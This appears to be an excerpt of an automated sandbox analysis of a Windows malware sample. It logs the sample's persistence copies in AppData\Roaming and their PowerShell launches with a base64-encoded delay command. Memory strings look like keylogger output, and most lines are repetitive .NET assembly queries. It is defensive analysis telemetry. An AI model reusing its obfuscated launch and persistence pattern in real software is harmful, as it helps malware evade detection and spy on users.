              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp, izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r{Win}
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r{Win}r
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Users\user\Desktop\izwFjkhFJm.exe VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Users\user\Desktop\izwFjkhFJm.exe VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
